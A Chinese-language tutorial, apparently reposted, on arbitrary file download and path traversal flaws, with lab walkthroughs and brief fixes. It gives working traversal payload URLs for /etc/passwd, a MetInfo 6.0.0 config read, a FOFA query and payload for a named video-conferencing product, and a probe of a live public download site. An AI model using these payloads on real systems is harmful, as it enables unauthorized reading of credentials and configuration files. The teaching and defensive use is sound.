任意文件下载、文件读取

有目标就不怕路远。年轻人.无论你现在身在何方.重要的是你将要向何处去。只有明确的目标才能助你成功。没有目标的航船.任何方向的风对他来说都是逆风。因此,再遥远的旅程,只要有目标.就不怕路远。没有目标,哪来的劲头?一车尔尼雷夫斯基

导读:本篇文章讲解 任意文件下载、文件读取,希望对大家有帮助,欢迎收藏,转发!站点地址:www.bmabk.com,来源:原文

简介

文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。

如果后台在收到请求的文件名后,将其直接拼进下载文件的路径中而不对其进行安全判断的话,则可能会引发不安全的文件下载漏洞。此时如果攻击者提交的不是一个程序预期的的文件名,而是一个精心构造的路径(比如…/…/…/etc/passwd),则很有可能会直接将该指定的文件下载下来。 从而导致后台敏感信息(密码文件、源代码等)被下载。

所以,在设计文件下载功能时,如果下载的目标文件是由前端传进来的,则一定要对传进来的文件进行安全考虑。 切记:所有与前端交互的数据都是不安全的,不能掉以轻心!

危害

攻击者可以读取下载服务器中的配置文件、敏感文件等,会提供攻击者更多可用信息,提高被入侵的风险。

脑图

任意文件下载、文件读取

利用条件

  1. 存在读文件的函数
  2. 读取文件的路径用户可控且未校验或校验不严
  3. 输出了文件内容
  4. 任意文件读取下载漏洞测试

测试思路

寻找读取或下载文件的功能点,跳跃目录获取敏感文件。有的限制目录不严格,只对部分目录限制,可以尝试用其他敏感文件路径

靶机测试

使用web for pentester进行测试,我们这里不研究攻击靶场的思路,如果你有兴趣,可以通过“参考”中给出的Web for Pentester 靶场学习记录进一步学习它。

安装

下载地址:https://download.vulnhub.com/pentesterlab/web_for_pentester_i386.iso
像安装普通的linux系统那样安装即可,启动它后,即可直接进入,没有繁杂的操作系统安装过程。
我们这里选择的是目录穿越,作为演示案例。
在这里插入图片描述

Example 1

鼠标右键“查看图像”,知道默认头像地址是

http://x.x.x.x/dirtrav/example1.php?file=hacker.png

在这里插入图片描述
在这里插入图片描述

按照「测试思路」中提到的方式,使用../../../的形式造成目录穿越,进行任意文件下载。
这里实际上不能下载,只能显示在浏览器中😓

http://192.168.239.134//dirtrav/example1.php?file=../../../../../etc/passwd

在这里插入图片描述

Example 2

方法同上,鼠标右键“查看图像”,知道默认头像地址是

http://192.168.239.134/dirtrav/example2.php?file=/var/www/files/hacker.png

在这里插入图片描述

对文件名进行修改,把hacker.png替换为../../../../../etc/passwd,得出地址:

http://192.168.239.134/dirtrav/example2.php?file=/var/www/files/../../../../../etc/passwd

在这里插入图片描述

Example 3

由于靶场在我们的文件后面手动添加了 .png 后缀,导致我们不能随心所欲的读取文件了,那就00截断。
方法同上,鼠标右键“查看图像”,知道默认头像地址是

http://192.168.239.134/dirtrav/example3.php?file=hacker

在这里插入图片描述

构造payload:

http://192.168.239.134//dirtrav/example3.php?file=../../../../../../../etc/passwd%00

在这里插入图片描述

CMS测试

这里选的是MetInfo cms 6.0.0 进行任意文件读取漏洞演示

安装

下载地址:https://www.metinfo.cn/upload/file/MetInfo6.0.0.zip
漏洞环境:phpstudy、windows
存在漏洞:任意文件读取
在pupstudy的www目录下新建一个文件夹,然后把压缩包解压进去,重启phpstudy,浏览器访问
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

利用过程

漏洞点在:MetInfo6.0.0/include/thumb.php?dir=
浏览器访问为:
在这里插入图片描述

BurpSuite重放:
MetInfo6.0.0/include/thumb.php?dir=http\..\..\config\config_db.php
在这里插入图片描述

实战-1

「银澎云计算 好视通视频会议系统」 存在任意文件下载,攻击者可以通过漏洞获取敏感信息

FOFA

app=“Hanming-Video-Conferencing”

漏洞复现

登录界面如图
在这里插入图片描述

漏洞URL为:

https://xxx.xxx.xxx.xxx/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini

在这里插入图片描述

实战-2

智能电视网:http://down.znds.com/
当我下载一个文件的时候,把鼠标放在“立即下载”上面,左下角会出现一个链接(用箭头指向了),点一下“立即下载”,文件就会下载下来,那么对着“立即下载”按钮鼠标右键复制此链接,即,拿到下载地址
在这里插入图片描述

分析

下载下来的文件名称是:dangbeimarket_4.2.9_262_znds.apk
复制出来的下载地址是:http://down.znds.com/getdownurl/?s=L3VwZGF0ZS8yMDIxLTAzLTExL2RhbmdiZWltYXJrZXRfNC4yLjlfMjYyX3puZHMuYXBr

会发现L3VwZGF0ZS8yMDIxLTAzLTExL2RhbmdiZWltYXJrZXRfNC4yLjlfMjYyX3puZHMuYXBr看起来像是一个base64编码的东西,解码之后:
在这里插入图片描述

发现与我们下载的文件名对上了。
这里其实就很类似前面的靶机了,限制可以下载任意文件,但是下载敏感文件还是不能的,譬如访问:http://down.znds.com/getdownurl/?s=…/…/…/…/…/…/…/…/…/…/…/…/…/…/etc/password,编码之后就是http://down.znds.com/getdownurl/?s=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3b3Jk,访问之后
在这里插入图片描述

但是下载普通文件应该还是绰绰有余的

漏洞修复方案

1:对./../..\等进行过滤
2:严格控制可读取或下载的文件路径

参考

[红日安全]Web安全Day9 – 文件下载漏洞实战攻防
Web for Pentester 靶场学习记录

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/134308.html

(0)
飞熊的头像飞熊bm

相关推荐

发表回复

登录后才能评论
极客之音——专业性很强的中文编程技术网站,欢迎收藏到浏览器,订阅我们!